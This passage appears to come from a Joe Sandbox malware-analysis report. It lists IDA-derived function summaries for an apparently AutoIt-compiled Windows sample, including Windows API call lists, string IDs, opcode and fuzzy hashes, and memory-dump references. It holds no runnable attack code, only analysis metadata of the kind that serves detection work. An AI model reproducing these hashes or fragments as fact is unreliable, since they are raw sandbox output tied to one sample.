                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                        • String ID: *.*
                                                        • API String ID: 34673085-438819550
                                                        • Opcode ID: c97e512d149fe2904ddd9203856d5c123453050020960250b8280c435b589bee
                                                        • Instruction ID: b831db043f037faf1c1ca5bb6269bcad1f309484ad0b582099316bddcd096e90
                                                        • Opcode Fuzzy Hash: c97e512d149fe2904ddd9203856d5c123453050020960250b8280c435b589bee
                                                        • Instruction Fuzzy Hash: 2D81A1716043019FCF24EF24C8449AEB7E8BFC9304F54A82EF989E7252E730D9558B92
                                                        APIs
                                                          • Part of subcall function 00E5B34E: GetWindowLongW.USER32(?,000000EB), ref: 00E5B35F
                                                        • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00EAEF3B
                                                        • GetFocus.USER32 ref: 00EAEF4B
                                                        • GetDlgCtrlID.USER32(00000000), ref: 00EAEF56
                                                        • _memset.LIBCMT ref: 00EAF081
                                                        • GetMenuItemInfoW.USER32 ref: 00EAF0AC
                                                        • GetMenuItemCount.USER32(00000000), ref: 00EAF0CC
                                                        • GetMenuItemID.USER32(?,00000000), ref: 00EAF0DF
                                                        • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 00EAF113
                                                        • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 00EAF15B
                                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00EAF193
                                                        • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00EAF1C8
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                        • String ID: 0
                                                        • API String ID: 1296962147-4108050209
                                                        • Opcode ID: b01abd4066d435078b85fc2caec042a119c91ffb6a4e27ea0f21a9f25fc28907
                                                        • Instruction ID: 283c99e10be54b133e099af07326bfb0c8d157f3f2919b611e798e44521c85db
                                                        • Opcode Fuzzy Hash: b01abd4066d435078b85fc2caec042a119c91ffb6a4e27ea0f21a9f25fc28907
                                                        • Instruction Fuzzy Hash: D4817B70209311AFD720CF55CC84A6BBBE8FB89318F00592DF994AB292D771E905CB92
                                                        APIs
                                                          • Part of subcall function 00E7ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00E7ABD7
                                                          • Part of subcall function 00E7ABBB: GetLastError.KERNEL32(?,00E7A69F,?,?,?), ref: 00E7ABE1
                                                          • Part of subcall function 00E7ABBB: GetProcessHeap.KERNEL32(00000008,?,?,00E7A69F,?,?,?), ref: 00E7ABF0
                                                          • Part of subcall function 00E7ABBB: HeapAlloc.KERNEL32(00000000,?,00E7A69F,?,?,?), ref: 00E7ABF7
                                                          • Part of subcall function 00E7ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00E7AC0E
                                                          • Part of subcall function 00E7AC56: GetProcessHeap.KERNEL32(00000008,00E7A6B5,00000000,00000000,?,00E7A6B5,?), ref: 00E7AC62
                                                          • Part of subcall function 00E7AC56: HeapAlloc.KERNEL32(00000000,?,00E7A6B5,?), ref: 00E7AC69
                                                          • Part of subcall function 00E7AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00E7A6B5,?), ref: 00E7AC7A
                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00E7A8CB
                                                        • _memset.LIBCMT ref: 00E7A8E0
                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00E7A8FF
                                                        • GetLengthSid.ADVAPI32(?), ref: 00E7A910
                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 00E7A94D
                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00E7A969
                                                        • GetLengthSid.ADVAPI32(?), ref: 00E7A986
                                                        • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00E7A995
                                                        • HeapAlloc.KERNEL32(00000000), ref: 00E7A99C
                                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00E7A9BD
                                                        • CopySid.ADVAPI32(00000000), ref: 00E7A9C4
                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00E7A9F5
                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00E7AA1B
                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00E7AA2F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                        • String ID:
                                                        • API String ID: 3996160137-0
                                                        • Opcode ID: 5fc5a2d8e40718dbcfba57ad9e6e6759eb0ee02f34aa6fafeec40bb5650776b4
                                                        • Instruction ID: 74fd15f83733f31ae222fdde983556f1255394e76bd9a483440ae5066df99958
                                                        • Opcode Fuzzy Hash: 5fc5a2d8e40718dbcfba57ad9e6e6759eb0ee02f34aa6fafeec40bb5650776b4
                                                        • Instruction Fuzzy Hash: A8514A71900209AFDF00DF95DC45EEEBBBAFF44304F089139E919B6290DB329A16CB61
                                                        APIs
                                                        • GetDC.USER32(00000000), ref: 00E99E36
                                                        • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00E99E42
                                                        • CreateCompatibleDC.GDI32(?), ref: 00E99E4E
                                                        • SelectObject.GDI32(00000000,?), ref: 00E99E5B
                                                        • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00E99EAF
                                                        • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 00E99EEB
                                                        • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00E99F0F
                                                        • SelectObject.GDI32(00000006,?), ref: 00E99F17
                                                        • DeleteObject.GDI32(?), ref: 00E99F20
                                                        • DeleteDC.GDI32(00000006), ref: 00E99F27
                                                        • ReleaseDC.USER32(00000000,?), ref: 00E99F32
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                        • String ID: (
                                                        • API String ID: 2598888154-3887548279
                                                        • Opcode ID: b1ef57fc72080dc5bf2469698eb403959f6110ebfb82026f3ece4abcf02d9edf
                                                        • Instruction ID: 3f709922e110df40f58258f2aa5c3391645887da9c1c9b2208c700c81031ddf8
                                                        • Opcode Fuzzy Hash: b1ef57fc72080dc5bf2469698eb403959f6110ebfb82026f3ece4abcf02d9edf
                                                        • Instruction Fuzzy Hash: 19514A75904309EFCB14CFA9CC85EAEBBB9EF48310F14842DF959A7210D732A945CB50
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: LoadString__swprintf_wprintf
                                                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                        • API String ID: 2889450990-2391861430
                                                        • Opcode ID: 7798b597441981c8854b9abeba65c65419b7ae498a4d6ac63eba7a6a03e1335c
                                                        • Instruction ID: 7d0203d6446ae54c3ca42454012abefefda156da7288323e296364555915ce35
                                                        • Opcode Fuzzy Hash: 7798b597441981c8854b9abeba65c65419b7ae498a4d6ac63eba7a6a03e1335c
                                                        • Instruction Fuzzy Hash: 00517D32800609BBCB15FBA0DD46EEEB7B8EF05344F205165F509721A2EB316F59DB61
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: LoadString__swprintf_wprintf
                                                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                        • API String ID: 2889450990-3420473620
                                                        • Opcode ID: 47ef1e07b1cc55c61d37886ab7bc824d2a459a5605dadd91f16f9e08b6a1cdd5
                                                        • Instruction ID: 4b510a672a91fea913541e57c8621564a3c4af899d46d4d898af1caffc97d907
                                                        • Opcode Fuzzy Hash: 47ef1e07b1cc55c61d37886ab7bc824d2a459a5605dadd91f16f9e08b6a1cdd5
                                                        • Instruction Fuzzy Hash: 60519E32900609AACF15FBE0ED42EEEB7B8AF05344F205065F509731A2EB716F59DB61
                                                        APIs
                                                        • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00EA2BB5,?,?), ref: 00EA3C1D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: BuffCharUpper
                                                        • String ID: $E$HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                        • API String ID: 3964851224-1752687603
                                                        • Opcode ID: 76318cb014ddbd297e5f581cb59dac327210db6a24855918a72678dd32e8b50f
                                                        • Instruction ID: 82346361bf124a6013932f40141bdb1b7145c448bdb582fd18fa57a17f6c6de9
                                                        • Opcode Fuzzy Hash: 76318cb014ddbd297e5f581cb59dac327210db6a24855918a72678dd32e8b50f
                                                        • Instruction Fuzzy Hash: 6F414E7011028A8BCF04EF24D851AEB73A5AF96344F106855FC957F292EB70EE4ACB60
                                                        APIs
                                                        • _memset.LIBCMT ref: 00E855D7
                                                        • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00E85664
                                                        • GetMenuItemCount.USER32(00F01708), ref: 00E856ED
                                                        • DeleteMenu.USER32(00F01708,00000005,00000000,000000F5,?,?), ref: 00E8577D
                                                        • DeleteMenu.USER32(00F01708,00000004,00000000), ref: 00E85785
                                                        • DeleteMenu.USER32(00F01708,00000006,00000000), ref: 00E8578D
                                                        • DeleteMenu.USER32(00F01708,00000003,00000000), ref: 00E85795
                                                        • GetMenuItemCount.USER32(00F01708), ref: 00E8579D
                                                        • SetMenuItemInfoW.USER32(00F01708,00000004,00000000,00000030), ref: 00E857D3
                                                        • GetCursorPos.USER32(?), ref: 00E857DD
                                                        • SetForegroundWindow.USER32(00000000), ref: 00E857E6
                                                        • TrackPopupMenuEx.USER32(00F01708,00000000,?,00000000,00000000,00000000), ref: 00E857F9
                                                        • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00E85805
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                        • String ID:
                                                        • API String ID: 3993528054-0
                                                        • Opcode ID: 40bf1a70fb540bcc29265c75bc99f86fc3ff193639a494c514806f5c21308e37
                                                        • Instruction ID: 236286ce835605c6dadb6e306c1413508000e9890468f4da6c6b25bd7a9b6db1
                                                        • Opcode Fuzzy Hash: 40bf1a70fb540bcc29265c75bc99f86fc3ff193639a494c514806f5c21308e37
                                                        • Instruction Fuzzy Hash: 94710372640605BFEB21AB15CC49FAABFA5FF00368F244216F51C7A1D0DB725C10EB91
                                                        APIs
                                                        • _memset.LIBCMT ref: 00E7A1DC
                                                        • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00E7A211
                                                        • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00E7A22D
                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00E7A249
                                                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00E7A273
                                                        • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00E7A29B
                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00E7A2A6
                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00E7A2AB
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset
                                                        • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                        • API String ID: 1687751970-22481851
                                                        • Opcode ID: a47136ea39d50dc260fc2c25cbd247a9ea2a67f9abd83d3b22d4f4a89a7947f5
                                                        • Instruction ID: 64f32077882057f6c6973a82f99e8f64894dcc167509dbb44ab0302aa7e31068
                                                        • Opcode Fuzzy Hash: a47136ea39d50dc260fc2c25cbd247a9ea2a67f9abd83d3b22d4f4a89a7947f5
                                                        • Instruction Fuzzy Hash: DA410372C11229ABDB25EFA4EC85DEEB7B8BF04344F045069E905B3261EB319E09CB50
                                                        APIs
                                                        • __swprintf.LIBCMT ref: 00E867FD
                                                        • __swprintf.LIBCMT ref: 00E8680A
                                                          • Part of subcall function 00E6172B: __woutput_l.LIBCMT ref: 00E61784
                                                        • FindResourceW.KERNEL32(?,?,0000000E), ref: 00E86834
                                                        • LoadResource.KERNEL32(?,00000000), ref: 00E86840
                                                        • LockResource.KERNEL32(00000000), ref: 00E8684D
                                                        • FindResourceW.KERNEL32(?,?,00000003), ref: 00E8686D
                                                        • LoadResource.KERNEL32(?,00000000), ref: 00E8687F
                                                        • SizeofResource.KERNEL32(?,00000000), ref: 00E8688E
                                                        • LockResource.KERNEL32(?), ref: 00E8689A
                                                        • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00E868F9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                        • String ID: 5
                                                        • API String ID: 1433390588-3632891597
                                                        • Opcode ID: 03bffdb01c804ad9af2d376d93b4d4e78deb6404a9fb7b518a6f9ef9726d4347
                                                        • Instruction ID: 6a86355bcd6341149b3642f1050103a8c57ad84b1301d65f7284ae7baa64db15
                                                        • Opcode Fuzzy Hash: 03bffdb01c804ad9af2d376d93b4d4e78deb6404a9fb7b518a6f9ef9726d4347
                                                        • Instruction Fuzzy Hash: 5F318071A0421AAFDB15AF61ED45EBBBBA8FF08344F008425F90DF2150E731D915DB60
                                                        APIs
                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00EB36F4,00000010,?,Bad directive syntax error,00EDDC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 00E825D6
                                                        • LoadStringW.USER32(00000000,?,00EB36F4,00000010), ref: 00E825DD
                                                        • _wprintf.LIBCMT ref: 00E82610
                                                        • __swprintf.LIBCMT ref: 00E82632
                                                        • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00E826A1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: HandleLoadMessageModuleString__swprintf_wprintf
                                                        • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                        • API String ID: 1080873982-4153970271
                                                        • Opcode ID: 1fce724802f4bbb923931a2dae762afc1f8d77e1490f01ce618b2a1663c5e8f5
                                                        • Instruction ID: da34277b504e612c56917be10bee7856cb4f8200ce4c4c46774b23f70acb9f45
                                                        • Opcode Fuzzy Hash: 1fce724802f4bbb923931a2dae762afc1f8d77e1490f01ce618b2a1663c5e8f5
                                                        • Instruction Fuzzy Hash: 9721713284021DAFCF11BBA0DC0AEEE7778BF18344F045465F609720A2EA71A619DB51
                                                        APIs
                                                        • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00E87B42
                                                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00E87B58
                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E87B69
                                                        • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00E87B7B
                                                        • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00E87B8C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: SendString
                                                        • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                        • API String ID: 890592661-1007645807
                                                        • Opcode ID: 63bf21f2e9d6558654daad8507dda00ada4bdd4ecdc941cca0fc2ab58153ba4b
                                                        • Instruction ID: 3c16f637e4e28404230753aef3f4e89485a94b3672165ca0161b4b170a8a723a
                                                        • Opcode Fuzzy Hash: 63bf21f2e9d6558654daad8507dda00ada4bdd4ecdc941cca0fc2ab58153ba4b
                                                        • Instruction Fuzzy Hash: CC11C4A1A5025D79D720B771DC4ADFFBBBDEBD1B00F10242A7519B30D1EA705A49C6B0
                                                        APIs
                                                        • timeGetTime.WINMM ref: 00E87794
                                                          • Part of subcall function 00E5DC38: timeGetTime.WINMM(?,75A8B400,00EB58AB), ref: 00E5DC3C
                                                        • Sleep.KERNEL32(0000000A), ref: 00E877C0
                                                        • EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 00E877E4
                                                        • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00E87806
                                                        • SetActiveWindow.USER32 ref: 00E87825
                                                        • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00E87833
                                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 00E87852
                                                        • Sleep.KERNEL32(000000FA), ref: 00E8785D
                                                        • IsWindow.USER32 ref: 00E87869
                                                        • EndDialog.USER32(00000000), ref: 00E8787A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                        • String ID: BUTTON
                                                        • API String ID: 1194449130-3405671355
                                                        • Opcode ID: 5882c707f454cc3d61c3c4ef983052234ebe44994ba0b9ffede3e7f259d58a83
                                                        • Instruction ID: cdb9d64df13ee1be71f8ae4a2f9042172a8617d8974caefe1a62410acaad5bf2
                                                        • Opcode Fuzzy Hash: 5882c707f454cc3d61c3c4ef983052234ebe44994ba0b9ffede3e7f259d58a83
                                                        • Instruction Fuzzy Hash: 5A213E70208209AFE7096B61EC89F263F6DFB44359F142035F55EB2162CB739D19EB21
                                                        APIs
                                                          • Part of subcall function 00E4936C: __swprintf.LIBCMT ref: 00E493AB
                                                          • Part of subcall function 00E4936C: __itow.LIBCMT ref: 00E493DF
                                                        • CoInitialize.OLE32(00000000), ref: 00E9034B
                                                        • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00E903DE
                                                        • SHGetDesktopFolder.SHELL32(?), ref: 00E903F2
                                                        • CoCreateInstance.OLE32(00ECDA8C,00000000,00000001,00EF3CF8,?), ref: 00E9043E
                                                        • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00E904AD
                                                        • CoTaskMemFree.OLE32(?,?), ref: 00E90505
                                                        • _memset.LIBCMT ref: 00E90542
                                                        • SHBrowseForFolderW.SHELL32(?), ref: 00E9057E
                                                        • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00E905A1
                                                        • CoTaskMemFree.OLE32(00000000), ref: 00E905A8
                                                        • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00E905DF
                                                        • CoUninitialize.OLE32(00000001,00000000), ref: 00E905E1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
